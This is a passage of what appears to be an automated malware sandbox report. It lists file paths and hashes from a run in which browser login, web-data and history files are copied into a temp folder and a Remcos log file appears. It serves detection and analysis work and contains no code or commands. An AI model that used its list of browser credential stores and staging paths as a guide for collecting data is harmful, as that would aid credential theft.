| SHA512 | f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_1
| MD5 | d0d388f3865d0523e451d6ba0be34cc4 |
| SHA1 | 8571c6a52aacc2747c048e3419e5657b74612995 |
| SHA256 | 902f30c1fb0597d0734bc34b979ec5d131f8f39a4b71b338083821216ec8d61b |
| SHA512 | 376011d00de659eb6082a74e862cfac97a9bb508e0b740761505142e2d24ec1c30aa61efbc1c0dd08ff0f34734444de7f77dd90a6ca42b48a4c7fad5f0bddd17 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_0
| MD5 | cf89d16bb9107c631daabf0c0ee58efb |
| SHA1 | 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b |
| SHA256 | d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e |
| SHA512 | 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0 |
memory/2400-153-0x0000000022010000-0x0000000022029000-memory.dmp
memory/2400-152-0x0000000022010000-0x0000000022029000-memory.dmp
memory/2400-149-0x0000000022010000-0x0000000022029000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\mjefag
| MD5 | ac300aeaf27709e2067788fdd4624843 |
| SHA1 | e98edd4615d35de96e30f1a0e13c05b42ee7eb7b |
| SHA256 | d2637d58bb120dc6fefe2f38d6e0d4b308006b8639106a7f9e915fa80b5cc9d9 |
| SHA512 | 09c46e708f9d253dccd4d943639d9f8126f868ae3dcd951aad12222bb98b5d3814676f878c8391b9bdab5dedcf5b9e9eaeb2ad3ffec57bda875198735586d4df |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat
| MD5 | 27fd94e525bf74864e40da4b3612eeb8 |
| SHA1 | c596943624798eb96ae067548305c01691eee6e6 |
| SHA256 | 05dde8e3836eeb31fdac7a0cc3da644b502fe299c85eb00b4423f1dfe9fdcb91 |
| SHA512 | 78425b52a1be542797d6f8d2a4971a40a962acf5d090daa546816916c815f2e21445636cf51839cce0fa9a8fab572ee8eda83b7a7226d3b8b795641fa91e8def |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\throttle_store.dat
| MD5 | 9e4e94633b73f4a7680240a0ffd6cd2c |
| SHA1 | e68e02453ce22736169a56fdb59043d33668368f |
| SHA256 | 41c91a9c93d76295746a149dce7ebb3b9ee2cb551d84365fff108e59a61cc304 |
| SHA512 | 193011a756b2368956c71a9a3ae8bc9537d99f52218f124b2e64545eeb5227861d372639052b74d0dd956cb33ca72a9107e069f1ef332b9645044849d14af337 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat
| MD5 | 317d044f50c669a8fa12b4f766cc5f71 |
| SHA1 | f47318c99da5e580611514ffbc844e6909fb716c |
| SHA256 | e5805654720245bae000c07d5e977991257740d84fe8db6a141fb0640bd146e7 |
| SHA512 | 7744658f4cf747ec2baf5ee0e495acb71b2521ee16b07f022ea4e44221edacb4efab849e5fafc032a8ed952b5c3c21f6ecca7c93a1ae1cef8bffcf0ce396dfa7 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat
| MD5 | 5f4873669d1ab040e423ad87bedabdf4 |
| SHA1 | 9fe2d68f8264bc3e52aa068d8c9e9f748705698a |
| SHA256 | ec7ba41e513cd3d49d52b23d42533e8f5e674d5d9fa3fc55fc40c2b95b425096 |
| SHA512 | 7fdfb9d8dfd1ac26ecc4522cd0aaf6283134dbd5b348ef9110d57b0fed3f2e00ea4a16a452a54834d3af6efea8ffff5e7a1ca633daae2d3b50a0242762248440 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State
| MD5 | 3d2d0e92d8a651c6ab2ff89573cb2387 |
| SHA1 | 1733247e71238ceb6283601fa4bca11c657815f5 |
| SHA256 | 66e59a07892dcef395d533d84d972c6e56771b6976c8e8c3699d20d68fc4bf1e |
| SHA512 | 37580d77090173b78f011b5fc50847a7bd68c847659079a846b8dcb4b78c689af3373b0713ee3c0a970b54649b0b967475a751bf203a9fa310b8b5eaf1aa6491 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Visited Links
| MD5 | ba1cc5b1a7fa41db1806bc12d9e06a65 |
| SHA1 | 0003bfbf59f6b96db8e83a0cc7f121164b12bbe2 |
| SHA256 | 50cd13b1c040460b134258014c1ee4b5290a7456653972c9db58db07528440b6 |
| SHA512 | 2f352d4c9fd2f1c19e4809397966d5ce40b4ea06ba5a580e4cf7cd82757de6f3056a63db7505bc49b889f055ab37c6b19924a42c513b4e4f72a4e12d8d21f62c |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\000003.log
| MD5 | 148079685e25097536785f4536af014b |
| SHA1 | c5ff5b1b69487a9dd4d244d11bbafa91708c1a41 |
| SHA256 | f096bc366a931fba656bdcd77b24af15a5f29fc53281a727c79f82c608ecfab8 |
| SHA512 | c2556034ea51abfbc172eb62ff11f5ac45c317f84f39d4b9e3ddbd0190da6ef7fa03fe63631b97ab806430442974a07f8e81b5f7dc52d9f2fcdc669adca8d91f |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\000003.log
| MD5 | 90881c9c26f29fca29815a08ba858544 |
| SHA1 | 06fee974987b91d82c2839a4bb12991fa99e1bdd |
| SHA256 | a2ca52e34b6138624ac2dd20349cde28482143b837db40a7f0fbda023077c26a |
| SHA512 | 15f7f8197b4fc46c4c5c2570fb1f6dd73cb125f9ee53dfa67f5a0d944543c5347bdab5cce95e91dd6c948c9023e23c7f9d76cff990e623178c92f8d49150a625 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\LOG
| MD5 | ae8580357c8254e846ab8598e556792d |
| SHA1 | 0c9768c08a055e3d5c505b49df2586e0bcc8f07e |
| SHA256 | 3c00e626112a3a424d0167280a62586ad0e4575d257962a8d82addecb35d97c6 |
| SHA512 | f4675be906a7fb00f2b9d9c1f57d71e9535cb14f82955324a4a441afeecbde4f424f58c87e2a954d7a7263a2d0f6ec911bbaea9d32688a7d5b641eed693c6cfd |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Login Data
| MD5 | a182561a527f929489bf4b8f74f65cd7 |
| SHA1 | 8cd6866594759711ea1836e86a5b7ca64ee8911f |
| SHA256 | 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914 |
| SHA512 | 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\wasm\index
| MD5 | 54cb446f628b2ea4a5bce5769910512e |
| SHA1 | c27ca848427fe87f5cf4d0e0e3cd57151b0d820d |
| SHA256 | fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d |
| SHA512 | 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\History
| MD5 | d30bfa66491904286f1907f46212dd72 |
| SHA1 | 9f56e96a6da2294512897ea2ea76953a70012564 |
| SHA256 | 25bee9c6613b6a2190272775a33471a3280bd9246c386b72d872dc6d6dd90907 |
| SHA512 | 44115f5aaf16bd3c8767bfb5610eba1986369f2e91d887d20a9631807c58843434519a12c9fd23af38c6adfed4dbf8122258279109968b37174a001320839237 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\LOG
| MD5 | a23a1ccd6edf23104620f1bb9f4f547b |
| SHA1 | 2078abb42cc2ad96d3cbb00b876bda35af59859c |
| SHA256 | b40c1227d466f7c9bd96b3cf26dfc63ea43427cc4f0515fa346332f4ff5cd7b1 |
| SHA512 | 6d2f9d8292e7f3bc0e099d14b1487940233d27d4849a5756cb2d0f1bc51afba0d7f1c5b3cb8ef9913b22ec138a1759abc26497aa936e67023b73a7a6396483e2 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Web Data
| MD5 | c35ba8876d1932d40ef0961d656f473e |
| SHA1 | 004571bf1d1da9b87c399af9bffd8004ad0668c9 |
| SHA256 | 460344459d94034aeab7300abf5fe4d687b682538e9ab24e21249662534a0b16 |
| SHA512 | f5c871b6b00e97f3a6cc2f6f1ec7a07c5edb18ef822193025d042bd36c3de20a851eee223cbe1223d74348f33ffebaf3c9f4a2e71af70b31cd3cd393dc46a700 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences
| MD5 | 72fb8fdc79e886886d9cc89b88ef11db |
| SHA1 | b602840b49b5e657eb4f9cab689940c94179ebc4 |
| SHA256 | 623fb553bc909b8b591b994a232f3361b993a75d89d3374fa433af91ce63dfea |
| SHA512 | 0ac23f265781a01f7ab0434e4dbb9e1af441cd0227d317af3f9ab436a44585321b209e167bbabc7461e28407dde3ba3519d67c44d6f1762ad0fa4f151dd82f92 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Preferences
| MD5 | 03f5b0d0cde36047423d3f5744da6aec |
| SHA1 | 76afd3c804078639efd8db85925aaff22cd7eabd |
| SHA256 | 9047f92d0844c71ca1e579e82ac66980b998ea13606175c4094b37dd4c515745 |
| SHA512 | b4958125b5bda3be2b898ea7cf4580c82585f41ebdfb8859575dfc0bdd851cd206d12c268bfe2b0cd29b3a32415c012a03040a17800c14ce525188be61def59f |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Last Version
| MD5 | 838a7b32aefb618130392bc7d006aa2e |
| SHA1 | 5159e0f18c9e68f0e75e2239875aa994847b8290 |
| SHA256 | ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa |
| SHA512 | 9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Favicons
| MD5 | b40e1be3d7543b6678720c3aeaf3dec3 |
| SHA1 | 7758593d371b07423ba7cb84f99ebe3416624f56 |
| SHA256 | 2db221a44885c046a4b116717721b688f9a026c4cae3a17cf61ba9bef3ad97f4 |
| SHA512 | fb0664c1c83043f7c41fd0f1cc0714d81ecd71a07041233fb16fefeb25a3e182a77ac8af9910eff81716b1cceee8a7ee84158a564143b0e0d99e00923106cc16 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Top Sites
| MD5 | 986962efd2be05909f2aaded39b753a6 |
| SHA1 | 657924eda5b9473c70cc359d06b6ca731f6a1170 |
| SHA256 | d5dddbb1fbb6bbf2f59b9d8e4347a31b6915f3529713cd39c0e0096cea4c4889 |
| SHA512 | e2f086f59c154ea8a30ca4fa9768a9c2eb29c0dc2fe9a6ed688839853d90a190475a072b6f7435fc4a1b7bc361895086d3071967384a7c366ce77c6771b70308 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat
| MD5 | 32371b6dc560dd60285d3576fc66cce1 |
| SHA1 | 7ecd54d19a6262ca1d90ee5858116986847f0fc4 |
| SHA256 | 15f11555291d1e7d4008df75513d63267bb01589bb64c37b093881988ad83ab9 |
| SHA512 | 0592e3e2d3911d2d87d738132168bdf1a127258e4aa893936afcf70078d938697d1d104cb38fb8fddcdd9a95cdefe57473cd793fbf6ca06803183eba9963ef28 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\GPUCache\index
| MD5 | 4ba10349f3befe34968f7ca4437aafd7 |
| SHA1 | 95146f48d9164d6707c146ab657cb8a6bcfe2438 |
| SHA256 | e2eac33c29c3d6c7bbc4fd7a142c372712606bad72a416da9ec7f56b3d29a83c |
| SHA512 | 844d8d3cb6d9bd1fefb905d7e7b68196ce112f80a17d4dce468bc961b431ce0a51ec2876ea98ec622d7f4abd4753edee25d62373cc9e2340120d1ac536164939 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\LOG
| MD5 | b8c53c17a10b518cab9452e4521fa552 |
| SHA1 | 3b373f66a0171c05b4982d8d7281d782d2535f3e |
| SHA256 | 1991df4bf9aaf4368cb5bb8b3546084a58f88970d72d583c13e95a327182c4c4 |
| SHA512 | 90c03bfb214631d4ecf545398944a3ada13f04f2b62adf027140bb6517fe0b93601eb0224ce0bf87f0dd7dfa0ccee30eb073d18bf4118aa84f415a8f2ba7dea6 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\LOG
| MD5 | d2e1ddd2f035bc9c876e6436d82211bf |
| SHA1 | ce7a7371e89e9a2be7a998580afe8e58ded22395 |
| SHA256 | 478cd2c35d6bbb003c34bb20c4f06f2d9e3eb7eceb785c22a24dbf7e5aa6d555 |
| SHA512 | 09a279080c2c98db999bcc6f0f8bcbfb864b06323cd63b390170eda9f1f3c1628c22a757e2bf2bd62883d5812fd3ba6968b84fc2f04ef60837e4a59989e042fb |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\000003.log
| MD5 | 69449520fd9c139c534e2970342c6bd8 |
| SHA1 | 230fe369a09def748f8cc23ad70fd19ed8d1b885 |
| SHA256 | 3f2e9648dfdb2ddb8e9d607e8802fef05afa447e17733dd3fd6d933e7ca49277 |
| SHA512 | ea34c39aea13b281a6067de20ad0cda84135e70c97db3cdd59e25e6536b19f7781e5fc0ca4a11c3618d43fc3bd3fbc120dd5c1c47821a248b8ad351f9f4e6367 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Service Worker\Database\000003.log
| MD5 | 9082ba76dad3cf4f527b8bb631ef4bb2 |
| SHA1 | 4ab9c4a48c186b029d5f8ad4c3f53985499c21b0 |
| SHA256 | bff851dedf8fc3ce1f59e7bcd3a39f9e23944bc7e85592a94131e20fd9902ddd |
| SHA512 | 621e39d497dece3f3ddf280e23d4d42e4be8518e723ecb82b48f8d315fc8a0b780abe6c7051c512d7959a1f1def3b10b5ed229d1a296443a584de6329275eb40 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\LOG
| MD5 | 6d7732ece43bcf0323779f12d0c7890a |
| SHA1 | 026a0d7feb5508474d70731a8a3e22035a43100d |
| SHA256 | a6fca0d6dff89d0f7e15206dc34bb35e3bc74b8ce8a7028b87d8dd6d56065964 |
| SHA512 | 59eba3b222b38007225ca30330fa84424c83d56ab9e79691c3a858ef98b9548ba90384e60b4f1c8e031b0f8a16837f5b25f8c05d0b17cbad8ba769421cc27b6c |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\000003.log
| MD5 | 9dcac77a34b127cc6ffbc9d903c200be |
| SHA1 | dd03d3063d9447ea8ff3e56a58885ae6cf0cbeef |
| SHA256 | 695ff9680ecceb377a8c8579b53465b7ca6e8f99c71f3bf597f772b3816046ce |
| SHA512 | 64975b58eb851556ebc76184b7ae3f70c90b522aa7c243d93c871aee507b6669f9cf51159cbe91a98912632f3c8a3fa55c31d8e972801d335ce93689e6efe53f |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Preferences
| MD5 | 3295bd8de9f873108efa25a44ddc9f1c |
| SHA1 | 4118c09dca532bb55239047ee17111ffc7e737a1 |
| SHA256 | ea02816ba763cecbe154b5fdef32fef2f5187c40c0c1f9d6cb11b3f0278eb74b |
| SHA512 | 6f68a3fd12c3395f0fe219827b26f999d23d503d5522d288c929aeb4fe200237c740c9aa0d08b6492d94477c4b3cd1e1a57a3458fe7e1b9c99ad41464fa21afe |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\LOG
| MD5 | c022ae7c9a90a8394b7762dfbb61c674 |
| SHA1 | 5344261d8517843d2f33b2d3a8228ca80a7b9e2f |
| SHA256 | 2e5f065db402f038c8b1fbf9bbc9dd987e5ba747e89676c71bd9b508b2996545 |
| SHA512 | 23dcd933d0add359920286bc8225e9fa5ac14e8793a5bf90b6ab025382844214236bc0a383b5ccdb5e2c986e2781315e90c8473c7e9e6ed337d3297de05062a1 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\js\index-dir\the-real-index
| MD5 | bfc1e625b1da2fce382b2365c773e1a6 |
| SHA1 | 6a3913fb539f650e4f22c7afa1d1f5a124e37b76 |
| SHA256 | 230c201941a98941edfce0eddd0d01e36d8adb52a11c1e09199796645b4432f9 |
| SHA512 | f1cc86636a0e228cde249d5d7c75fc5adef8cdf3a4bec917fac7fc49bca7e3e83868017092fae7f4e1a5aac0648ebfea43625d293ab210d2a9307f4386e5b46a |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\wasm\index-dir\the-real-index
| MD5 | d250f162a2d2e500b40864682605cc26 |
| SHA1 | 250f25a3d167075095f0a03dc9c68908d3e40038 |
| SHA256 | e894385bc001a5d2994ce1c97f4c355f19d1cd1c805bfdc3b09fd2fac3af8cc3 |
| SHA512 | 821d05d450caa0afd61c39fa8b2dbfe8d762e6e9d92cca08513868b1562e5733b9927821fbbb1f0fd2dc07c372bd1e078ed543079172115bbb06b4a8fc04339b |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Service Worker\Database\LOG
| MD5 | 5ee1acea20c641249001096ce217c7a8 |
| SHA1 | 604076886f02ae2e455cc90147bb93aff28cfdbf |
| SHA256 | 22d81cf13acd5b1cec2a69a155f3c45f063b9c75f55c117c6d7d00b4db9b9f91 |
| SHA512 | 214bd384dcea00b061fda4ec1a171b961670eab190d40f32412a92b73dd0d715cdeb423e10c3b38230e7f7a00ef0be6c3bcc74d1970d397c940ca9a07ba043a7 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Microsoft Edge.lnk
| MD5 | 38fb716ea1b98ca10eb7f8c8a6002796 |
| SHA1 | 0b9b19ca4bae50d14e284d9a4968f8426932b787 |
| SHA256 | dd46df74499fbec20150154b60ab83b53b76e5c12388f96cd812650388a45da2 |
| SHA512 | 7085f7374646e59e5748cf2f87b07e4dba706cf3b4d4aa4cef9c7fe06a78d1d4a10c9e132201a1f77d5f7b5c87f652b87dd4bf90b933bc0f1eb33415e215d20c |
C:\ProgramData\remcos\logs.dat
| MD5 | 603c41ffecff412d9821a7f4ed2276e5 |
| SHA1 | 25cddc919515fc1b93a9c99de9c36fc81cf6ec66 |
| SHA256 | 0abdd57c92430d5fb4e14a257b8a4e404921a9b8a2a44ea225f59c2d36a77e7d |
| SHA512 | b9dbaccdc42253c0b40e69f354fdf90149128efcc0c4a0719dfc93a9493565579b9b370965e9242b0d220f41e8f10befa2fdc45b8028420796922ac50c93ea2b |